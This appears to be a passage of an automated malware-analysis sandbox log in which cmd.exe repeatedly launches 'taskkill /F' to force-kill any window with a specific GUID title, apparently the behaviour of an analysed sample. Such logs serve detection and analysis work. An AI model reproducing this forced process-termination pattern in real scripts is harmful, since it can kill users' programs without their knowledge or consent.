Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\taskkill.exe taskkill /F /FI 'Windowtitle eq {970C393F-F611-4722-B829-D8BA68B9C9AF}'
